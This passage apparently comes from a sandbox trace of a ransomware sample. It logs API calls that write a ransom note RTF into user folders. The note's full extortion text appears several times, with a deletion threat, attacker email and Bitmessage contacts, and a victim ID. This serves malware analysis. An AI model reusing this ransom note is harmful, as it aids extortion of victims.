lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.228] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2462808, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.228] WriteFile (in: hFile=0x2d4, lpBuffer=0x2462808*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2462808*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.234] CloseHandle (hObject=0x2d4) returned 1 [0289.235] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\#readme_eman#.rtf")) returned 0xffffffff [0289.235] GetLastError () returned 0x2 [0289.235] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.235] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.235] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 